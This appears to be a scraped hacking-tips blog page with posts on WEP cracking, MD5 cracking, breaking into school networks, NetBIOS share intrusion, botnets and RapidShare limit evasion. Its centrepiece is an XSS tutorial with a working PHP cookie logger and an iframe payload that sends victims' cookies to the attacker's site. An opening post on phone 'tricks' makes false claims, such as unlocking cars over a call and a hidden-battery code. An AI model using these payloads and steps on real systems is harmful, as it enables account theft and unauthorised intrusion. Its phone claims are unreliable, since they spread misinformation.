Mobile can be a Life Saver

Posted on by
6

There are a few things that can be done in times of grave emergencies. Your mobile phone can actually be a life saver or an emergency tool for survival. Check out the things that you can do with it: -

(1) EMERGENCY : The Emergency Number worldwide for **Mobile** is 112. If you find yourself out of coverage area of your mobile network and there is an emergency, Dial 112 And the mobile will search any existing network to establish the emergency number for you, And interestingly this number 112 can be dialed even if the keypad is locked. ** Try it out .**

(2) Have you locked your keys in the car? Does you car have remote keys? : This may come in handy someday. Good reason to own a cell phone: If you lock your keys in the car and the spare keys are at home, call Someone at home on their cell phone from your cell phone. Hold your cell phone about afoot from your car door and have the person at your home press the unlock button, holding it near the mobile phone on their end. Your car will unlock. Saves someone fro having to drive your keys to you. Distance is no object. You could be hundreds of miles away, And if you can reach someone who has the other “remote” for your car, you can unlock the doors (or the trunk).

(3) Hidden battery Power : Imagine your cell battery is very low, you are expecting an important call and you don’t have a charger. Nokia instrument comes with are serve battery. To activate, press the keys *3370# Your cell will restart with this reserve and the instrument will show a 50% ncrease in battery. This reserve will get charged when you charge your cell next time

(4) How to disable a STOLEN mobile phone? : To check your Mobile phone’s serial number, key in the following digits on your phone: * # 0 6 # A 15 digit code will appear on the screen. This number is unique to your handset. Write it down and keep it somewhere safe. When your phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless. You probably won’t get your phone back, but at least you know that
whoever stole it can’t use/sell it either.

(5) Be careful while using your mobile phone : When you try to call someone through mobile phone, don’t put your mobile closer to your ears until the recipient answers. Because directly after dialing, the mobile phone would use it’s maximum signaling power, which is: 2 watts = 33 dbi, Please Be Careful, Message as received (Save your brain) Please use left ear while using cell (mobile), because if you use the right one it will affect brain directly. This is a true fact from Apollo medical team.

WEP Cracking, FBI Style( In Just 3 Minutes ) !

Posted on by
10

Okay, before we begin, I give you Hungry Hacker´s fun facts on WEP.

FUN FACTS:

-WEP stands for Wired Equivalent Privacy
-WEP is used to secure wireless networks from eavesdroppers
-WEP usually takes hours to crack

WEP has always been a long and tedious job, untill recently, when two FBI agents demonstrated how it´s possible to crack WEP in under 4 minutes (3 to be exact).

Here is how they did it:

1. Run Kismet to find your target network. Get the SSID and the channel.
2. Run Airodump and start capturing data.
3. With Aireplay, start replaying a packet on the target network. (You can find a ‘good packet’ by looking at the BSSID MAC on Kismet and comparing it to the captured packet’s BSSID MAC).
4. Watch as Airodump goes crazy with new IVs. Thanks to Aireplay.
5. Stop Airodump when you have about 1,000 IVs.
6. Run Aircrack on the captured file.
7. You should see the WEP key infront of you now.

PROGRAMS USED:

-Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
It is designed for Linux.

You can download it at www.kismetwireless.net
A windows version can be downloaded at http://www.renderlab.net/projects/wrt54g/kiswin.html

-Aircrack (Includes Airodump, Aireplay, Aircrack and optional Airdecap for decrypting WEP/WPA capture files)

Aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once enough encrypted packets have been captured with airodump.

Airdecap is used to decrypt WEP/WPA capture files.

Airmon can be used to configure the wireless card.

Aireplay is used to inject frames.

Airodump is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (initialization vectors) for the intent of using them with aircrack-ng.

Download the whole suit at www.aircrack-ng.org

Av fun and enjoy,
-Hungry Hacker

Cracking MD5

Posted on by
44

In this article, you will learn how to crack a MD5 hash, but the article is limited and does not include cracking salted MD5s. I’m terribly sorry but I haven’t actually researched that.

Now, we need a tool and a bunch of documents. Lets hope you have a little diskspace on your HDD.

The first and primary tool we are using is ‘Cain & Abel’. But we will be using Cain, it can be downloaded from www.oxid.it (Click on Projects at the top and then download Cain & Abel — one program).

Cain is a MD5 cracker, I dont really know wtf is Abel so lets just forget about that. You might be wondering why I haven’t used JTR (John the Ripper) in this article, I have been introduced to JTR a few times and read a few tuts on it but still, I hate all MS-DOS programs, unlike Cain which has a pwnage GUI.

Now, I’m assuming you have your hash. If you just want to test how good Cain can be (although the wordlists are the ones that are helping) and its options, then Google ‘MD5 calculator’ there are a few that encrypt strings to MD5 but make sure its not something like (5#$FD*&^%HFG@$@$). Now, most crackers cant do that kind of shit.
Choose a word, and maybe a number in between 0 and 99 or something else.

Now, on to the cracking! The MD5 I have on my hand is (562bed16598a6d9cbc07d2e9ba6cef97). Now, you can go off to databases and try to crack that just to see how effective the article is.

Now, what good is a cracker with its victim hash without a few decent wordlists, there is a wordlist (3000 KB+) that comes with Cain. Now, lets download a few wordlists.

http://library.2ya.com has a few in ‘Webhacks / Bug Scan’ section on the left, download them all. And after you have downloaded them, I suggest moving them all to the Wordlist directory of Cain for faster and more reliable cracking.

Now follow the images directions and you should be fine.

Cracker7fk

In the image above we have opened the Cracker and I have circled with red around the ‘Cracker’ tab which must be clicked to proceed.

Pages: 1 2 3 4

School Network Hacking

Posted on by
19

How to become Admin on your school Network. This way works for most schools.

Howdy Everyone

This tutorial is for those newbies out there, wanting to “hack” their school.

Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.

Firstly get a feel for the layout of the network.. you can do this quickly by:

Start > Programs(Right Click) > Explore

this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…

The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.

So to get around this you can do two things:

1) input this into the IE address “C:windowssystem32cmd.exe”

however this is very likely to be disabled.

2) Creating a Bat file to open Command Prompt.

You can do this by, opening IE > view > source.

once you have notepad open, where gonna make a .BAT file.

we want the BAT file to open up command prompt, so we type:

“CMD” without the “” press ENTER then save it as file.BAT.

Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.

So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.

Once we have it open now comes the good bit….

Before doing this, make sure you know a good lot of DOS commands.

Heres a great list www.computerhope.com/msdos

These are a few that you might like to try:

Net send * “Hungry Hacker is cool”

Shutdown -s -f -m &*92;NAME – rarely works

These will only work if you have the privilages to use them.

After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.

There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.

This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, – Now you have control over every computer!!

You could use the RAT to use the admins machine, here possibilites are endless!

Cookie Stealing for fun and profit

Posted on by
4

0×10 Introduction

XSS (cross site scripting) is usually criticized. It is said that XSS can do nothing, actually. All it can do is make a nice little alert box on your screen, telling you your cookies. That is a wrong assumption. Although it may be slightly difficult, you can use XSS to steal a user’s cookies. Cookies are used to store valuable information such as Username, Password, IP address and much more. This tutorial aims at teaching you Cookie Stealing, and by the end of this text file, you should be able to independently steal other people’s cookies.

DISCLAIMER:
This text is for educational purposes only. The author will not be held liable for any damages that occur from a reader for following this text or even learning from it.
######################################################

0×20 Finding the vulnerability

First, you have to find the XSS vulnerability. This may prove to be a bit of a challenge, but for sites with lower security, this is actually quite easy. For example, have you ever seen one of those guestbooks? Some of them are not properly configured to filter the text you type in. What does this mean? It means that you can manipulate the HTML of the page, and inject javascript code! Alright, let’s start off with something simple. Type this into the guestbook:
<script type=”text/javascript”>
alert(document.cookie)
</script>
Okay, now that’s done, click enter. If the guestbook does not properly check its input, then you should be able to see your cookie pop up! Of course, if you type that in and it doesn’t work, its probably gonna be a bit embarrassing, especially when the site admin taunts you. Anyway, to test whether a guestbook properly filters its input, type something like “You guys <b>suck</b>.” and see if the “suck” comes up in bold text.
If it does, the guestbook is probably not configured to filter input. However, XSS is not limited to guest books. Places in which you can change the HTML such as a page that uses a URL parameter to display an image or text, can be injected with a healthy dose
of XSS. For example, the URL is this:
site/bla.php?whatever=lol.gif
Now, imagine what the HTML for the image would be like…
<img src=”lol.gif”>
so they add a “> at the back, which means we can do this:
(start URL here)
site/bla.php?whatever=lol.gif”><script type=”text/javascript”>
alert(document.cookie)</script><a href=”test
(End url here)
and you’re done!

######################################################

0×30 Opening the gate

(This chapter is only for those who chose the URL as the XSS injection point, by the way)
Alright, all this is nice and pretty, but as I have said at the top, people criticize XSS as it can only work in your browser.
This means that to get an enemy’s password, you have to get him to sit down, login, and go to the injection page, then show you the alert box. Forgive my language, but like HELL that’s going to work. You have to be smart. You have to TRICK them into going into the page, and then use a technique I will explain in a later section to get their cookies.
This tricking technique is something known as social engineering. Don’t worry; it’s not
complicated at all. All you have to do is fool your friend. For example, if the page you are fooling him into going into is the guestbook, then you can say something like “Look at this cool guestbook! (insert URL here)” Be Creative. Don’t do it yet though, we still have the last piece of preparation to go…
######################################################

0×40 The Stealing

But once the luser goes to the site, what do you do then? “Hey, tell me all that info in that suspicious looking text box please?” Yeah right.
This is where the PHP code comes in. Get a free web host that supports PHP (preferably something like www.t35.com, although you will be breaking the rules in their TOS…) and make a new file. In the new file, type in this:

<html>

<body>

<?php

$stuff=$_GET['stuff'] . "\n";

$fh=fopen('evil.txt','ab');

fwrite($fh,$stuff);

fclose($fh);

?>

</body>

</html>


Wheee that was fun. Alright, save it as evil.php. Now make an empty text file named evil.txt, and type some stuff into it such as “Cookie Stealer Phile (Newline here)”. Alright, now you have to change the script that you put into the vulnerable site. Change it to

<IFRAME SRC=”javascript:window.location=%22(site)/evil.php?stuff=%22+document.cookie” height=”1″ width=”1″ frameborder=”0″></IFRAME>

Of course, change (site) into your site, and you are ready to go! Whenever a new luser gets lured into the trap, his cookies will be added to evil.txt!
######################################################

NetBIOS Attack

Posted on by
Reply

So NetBIOS is the first thing when you want to root to learn. In my article i will considerate that my target don”t have password protected the files, shared files.

Tools:
Windows target and attacker(i don”t know if this attack work on Linux or other os)

First we need to choose a target we will consider our target to be a friend from the same LAN who own BOX666

Step 1:
open cmd
start->run->cmd->enter

Step 2:
Now we need to gather info about our target BOX666 to do this we will do a net view command

c:>net view

We do this to see all computers from our LAN

Without scanning the host for open ports we can see if our target is vulnerable to NetBIOS attack and have Printer and Files Sharing activate. We use the nbtstat command. but we need the ip address not the box name so we will ping our target

c:>ping BOX666

After the pinging process end we have our target ip let’s say 1.1.1.1

Now we can use nbtstat command

c:>nbtstat -A 1.1.1.1

Now we get a list of some starnge data all what we are looking for is this:

<20>

This is a hex number who tell us that the BOX666 is vulnerable. Now we need to connect to target but if we connect what we can take. To gather information about shared files on BOX666 we use net view command

c:>net view 1.1.1.1

Now we have a list of shared files. Sometimes stupid users share a full partition or all partitions even the one where Windows is installed >:)

Step 3:
Now let”s connect using net use command

c:\>net use x: \\1.1.1.1shared_item

With this command we have created an network driver. To download data, upload data you can use cmd or windows explorer(recommended)

Step 4:
After you have done your job close the connection by using net use command

c:>net use x: /d

Now the network driver is gone

Congrats now you know how to do a NetBIOS Attack.

BotNets and Mass Backdooring

Posted on by
Reply

This article is designed to explain botnets, give an example of usage, and provide some good examples.

[What]
A botnet is a group of computers or servers all compromised with the same backdoor. The interesting thing about botnets is that these backdoors often have the ability to interact with other members of the botnet, and can also be controlled by the botnets owner. This can result in a single command, e.g. DDoS Microsoft.com, to flow down a chain of command in an instant, telling each member of the botnet to follow it. They also often leave backdoors accessible to the botnet user, and some even have built-in protocols for updating themselves. There are multiple chains of command that have been used in botnets, and these are:

P2P botnets, using these a command can be sent by the hacker to a single member of the botnet, and this single botnet will pass the command on to a handful of other members, which will carry on the chain and so on and so forth. the advantages of this are you cannot stop the botnet by taking out one member, but you would have to block the botnet completely. The problem is it is easy for individual bots to become separated from the rest of the net, usually resulting in being fixed.

Heirarchial botnets, which have different members assigned “ranks” in the command chain and are given specific bots to manage. Using this, the hacker might send a command to 4 different bots, which each pass the message on to 100, which each pass it on to 100. The problem with these is that the botnet can be shut down by removing the hack from one of the higher-up bots. The good thing about these is they can be very easily automated, and can pass reports of the computers up the chain as well as pass exploit upgrades down.

and single server bots, which all take their commands from one computer, these are very easy to make but are near enough useless.

[Propagation]
Botnets can be propagated by the hacker themselves, eg whenever they root a server or trojan a computer they add their program in too, run it and that computer becomes a bot. Another way is by mimicing worms and spreading through emails, p2p or instant messaging. Be imaginative, there are many ways of propagating that havent been tried yet.

[usage]
I will give an example of how a p2p botnet would be structured.
The bots propagation method is by exploiting a flaw in the security system of linux, and uses it to get root access.
The bot has a p2p structure, and can pass patches down the chain as well as commands.
The bot is automated by adding any computers it hacks to its own list of child bots(ones under its own command), and runs a check similar to ping to test if the net is up on the child before sending commands/patches.

[Famous Examples]
the storm worm:
This is an email-spread worm that takes over windows machines and injects a driver into the windows kernel to keep root. It currently has control of between 1- and 10- million windows machines around the world. It is extremely flexible, and has avoided gaining a signature for a massive amount of time.
There are many of examples on wikipedia of these, and google yields some interesting results.

I hope you enjoyed reading this article :)

Advanced Rapidshare Hacking

Posted on by
4

We all know that getting a new IP address from ISP allows us to download the next file from RapidShare. I bet many of us know this concept long ago but there wasn’t any program that can do this. Now, here is a program called Cryptload that is able to download the first file automatically without you entering the CAPTCHA code, and when it finished downloading, it will try to download the second file. Once it detects “You have reached the download-limit for free-users” message from RapidShare, it’ll disconnect and reconnect your Internet to get a new IP address. Then it’ll continue downloading the second file. All this is done automatically and you only need to add the RapidShare links to Cryptload. How easy is that?

But before you get to automate RapidShare downloading, I’ll show you what you need to do because I was stuck for a few days on Cryptload with some problems. Cryptload options buttonMost important setting that you must get it right is the Router section. Other than that, there is nothing else you need to configure in Cryptload. You can access Cryptload options by clicking the top right button that looks like this. Click on the Router button to configure your router settings. If you are using a modem to connect to the internet, select the Modem button. How do you know if you’re using a modem or router? If you need to dial up to the Internet like the below image, then you’re using a modem.

Advanced Rapidshare Hacking - The Ethical Hacking

If your internet automatically when you turn on the power for the small box, then it’s a router. So if you are using a router, click on the dropbox and search for your router model in the list.

Advanced Rapidshare Hacking - The Ethical Hacking

Here are the settings you must configure correctly.

IP Address: The IP Address of your router. To know your router’s IP address, run command prompt, type ipconfig and the Default Gateway is your router’s IP address.
Username and Password: The username and password used to login to your router. Please check your router’s manual if you don’t know the default login data.
Waittime after reconnect in sec: This is the time that it’ll wait to download the next RapidShare file after Cryptload tries to reconnect to the Internet. It depends on your ISP. Some might take longer to reconnect. Try 15 seconds first and if your Internet doesn’t gets connected before 15 seconds, increase it to 30 seconds and so on…

Now you can use Cryptload to automate RapidShare downloading. Here is how I do it.

1. Collect all RapidShare links that I want to download and paste them into a text file.
2. Run Cryptload
3. On the text file, press CTRL+A to select all, and then press CTRL+C. Link collector will appear and it will automatically decrypt the links.
4. Press Add button and press OK at Package settings. You can change the downloaded files location if you want.

What if your router’s model is not in the list?

Not to worry at all because the people who created Cryptload are very nice people and they are very willing to help you to create CLR file to support your router. Here’s what you need to do.

1. Install Live HTTP Headers extension for your Firefox browser.
2. Run Firefox, go to Tools -> Live HTTP Headers. Make sure capture checkbox is checked.
3. Go to Firefox window, login to your router, manually disconnect and then reconnect to the internet.
4. Go back to the Live HTTP headers, click Save all button and save it as router.txt
5. Click close to close Live HTTP headers.
6. Go to www.nopaste.com, enter your name in Nick, Description as your router brand with model and firmware version if possible. Make sure Plain is selected for language. Click on the Browse button and look for the router.txt file. Finally click Paste.
7. Wait for a few seconds, and you’ll be forwarded to a new page with the URL something like http://nopaste.com/p/xXXxxXxxX.
8. Go to www.cryptload.info website, at Live-Support, enter your username (your name), E-mail and click Los button. If cryptload staff is available, you can give them the nopaste URL to create your router’s CLR file. If not, you can fill up the form to send an email to them. I am sure they’ll get back to you with your CLR file.

Another way is to join Cryptload IRC channel and try getting help there. The person that patiently helped me from the beginning till the end was Apokalypser.

IRC Server: irc.german-elite.net
Channel: #cryptload

Once you got the CLR file from Cryptload staff, copy it to Cryptload’s router folder and it’ll be included in the router list when you run Cryptload the next time. Cryptload is a perfect way to unlimited rapidshare downloading. Well, only perfect for those with dynamic IP address. It is developed by shira, bocka and apokalypser. For those with static IP adress Rapid GraB may be the best way for you. NOTE: Cryptload requires at least Microsoft .NET Framework v2.0 and above. [ Download Cryptload | Cryptload Website ]